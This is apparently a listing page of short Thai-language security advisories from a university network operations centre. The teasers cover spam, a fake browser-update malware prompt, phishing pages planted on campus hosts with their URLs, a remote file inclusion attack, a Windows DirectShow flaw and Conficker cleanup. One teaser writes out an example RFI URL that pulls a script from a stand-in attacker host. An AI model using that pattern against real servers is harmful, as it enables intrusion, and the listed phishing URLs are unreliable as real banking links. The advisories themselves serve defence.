เว็บไซต์ noc.rmutl.ac.th สร้างขึ้นเพื่อบันทึกเหตุการณ์ทางด้านระบบเครือข่าย พร้อมทั้งเผยแพร่บทความทางด้านระบบเครือข่ายด้วย ซึ่งได้เปิดให้ผู้ใช้งานทั่วไปสามารถสมัครสมาชิก และแสดงความคิดเห็น ซักถามข้อสงสัยต่าง ๆ ได้ แต่เนื่องจากว่ามี SPAM จำนวนมาก ที่พยายามสมัครสมาชิกเพื่อโพสต์ข้อความต่าง ๆ จึงทำให้เสียเวลาต่อการจัดระเบียบดังกล่าว ดังนั้น เว็บไซต์ noc.rmutl.ac.th จึงขอปิดการสมัครสมาชิกเป็นการถาวร หา...[Read More]
security
สัปดาห์นี้ ทางทีมงานได้รับแจ้งเกี่ยวกับการแพร่ระบาดของ malware ซึ่งก่อกวนการใช้งานระบบอินเตอร์เน็ต ซึ่งมีลักษณะของการแจ้งเตือนผ่านเว็บเบราเซอร์ โดยให้มีการอัพเดทเบราเซอร์ (แต่ที่จริงแล้วเป็นการติดตั้งซอฟแวร์อันตรายเข้าไปในเครื่อง) โดยมีข้อความดังต่อไปนี้ the page does not support you version of browser. please update your software browser update หากเครื่องใดเจออาการดังกล่าว ห้ามคลิ๊ก...[Read More]
วันพฤหัสบดีที่ 16 ตุลาคม 2552 ได้รับการแจ้งเตือนทางโทรศัพท์จากธนาคาร HSBC ประทศไทย (และส่ง e-mail ตามมา) เกี่ยวกับการเกิด Phishing โดยอาศัยโฮสต์ของเขตพื้นที่พิษณุโลกเป็นเป้าหมาย จากการตรวจสอบพบว่า มีการแก้ไขข้อมูลให้เป็น Phishing จริง โดยหลอกล่อผู้ใช้งานให้กรอกข้อมูลหมายเลขบัตรเครดิตต่าง ๆ โดยมี url : ดังต่อไปนี้ http://fac.plc.rmutl.ac.th/eoffice/manual/IBlogin.html http://fac.plc.rmutl.ac.th/eof...[Read More]
วันพฤหัสบดีที่ 8 ตุลาคม 2552 ได้รับ e-mail แจ้งเตือน เกี่ยวกับการเกิด Phishing โดยอาศัยโฮสต์ของเขตพื้นที่พิษณุโลกเป็นเป้าหมาย จากการตรวจสอบพบว่า มีการแก้ไขข้อมูลให้เป็น Phishing จริง โดยหลอกล่อผู้ใช้งานให้กรอกข้อมูลหมายเลขบัตรเครดิตต่าง ๆ โดยมี url : ดังต่อไปนี้ http://ccucnorth.net/english/sermons/images/EggBanking.Update.php (ขณะนี้ url นี้ได้ถูกลบไปแล้ว) การแก้ไขปัญหาเบื้องต้นคือ ให้ลบไฟล์ Phis...[Read More]
วันอังคารที่ 29 กันยายน 2552 ได้รับแจ้งจาก ThaiCERT เกี่ยวกับการโจมตีเครื่องแม่ข่ายด้วย Remote file inclusion ซึ่งเป็นเทคนิคการเรียกใช้งานข้ามเครื่องแม่ข่าย เช่น **URL สมมุติ **** http://www.mydomain.com/index.php?page=http://www.hacker.com/hackscript.php? โดยสามารถติดตั้งโค๊ดต่าง ๆ ลงบนเครื่องแม่ข่ายได้ทันที ทางแก้ไขเบื้องต้นสำหรับผู้ดูแลระบบเครือข่ายและผู้ดูแลเครื่องแม่ข่ายคือ แก้ไขค่าพารามิเตอร...[Read More]
รายงานข่าวล่าสุดแจ้งว่า ไมโครซอฟท์แจ้งเตือนผู้ใช้ พบช่องโหว่วิกฤตใน DirectShow กรอบการทำงานสำหรับการเล่นไฟล์มีเดียชนิดต่างๆ ซึ่งพบได้ในระบบปฏิบัติการ Windows หลายเวอร์ชั่นด้วยกัน ผู้ไม่หวังดีสามารถโจมตี เหยื่อด้วยการซ่อนโค้ดอันตรายในไฟล์มีเดียที่อยู่ในฟอร์แมต QuickTime ซึ่งทางไมโครซอฟท์แจ้งว่า การบุกรุกด้วยวิธีนี้ไม่น่าจะเกิดขึ้นในวงจำกัด โดยเฉพาะผู้นิยมใช้ไฟล์ QuickTime โดยหลังจากเจาะระบบเข้าไปได...[Read More]
ก่อนนี้ ได้เคยแจ้งเกี่ยวกับการระบาดของไวรัส Kido , Conficker ของเครื่องแม่ข่าย พร้อมทั้งวิธีการกำจัดไวรัสไปแล้วนั้น ขณะนี้พบว่า มีการแพร่กระจายของไวรัส Kido , Conficker ที่เครื่องลูกข่าย และมีแนวโน้มที่จะสูงขึ้นเรื่อย ๆ สำนักวิทยบริการและเทคโนโลยีสารสนเทศจึงขอแจ้งให้สมาชิกทุกท่านร่วมมือกำจัดไวรัส โดยทำตามขั้นตอนดังที่เคยได้แจ้งก่อนหน้านี้ สำหรับครั้งนี้ทีมงานได้รวบรวมซอร์ฟแวร์และอัพเดทแพท ของระบบป...[Read More]
ชื่อที่คุ้นหู Conficker , Downandup , Kido เป็นหนอนที่แพร่กระจายตัวเองโดยโจมตีผ่านช่องโหว่ Windows Server service (SVCHOST.EXE) ของระบบปฏิบัติการไมโครซอฟท์วินโดว์ รายละเอียดติดตามได้ที่ http://www.thaicert.nectec.or.th/advisory/alert/conficker_r.php เมื่อติดหนอนชนิดนี้แล้ว สิ่งที่เกิดขึ้นคือ เครื่องแม่ข่ายที่ทำหน้าที่เป็นโดเม็น จะเกิดภาวะ Over Load คือ ไม่สามารถรองรับการเรียกใช้งานของเครื่องลูกข่า...[Read More]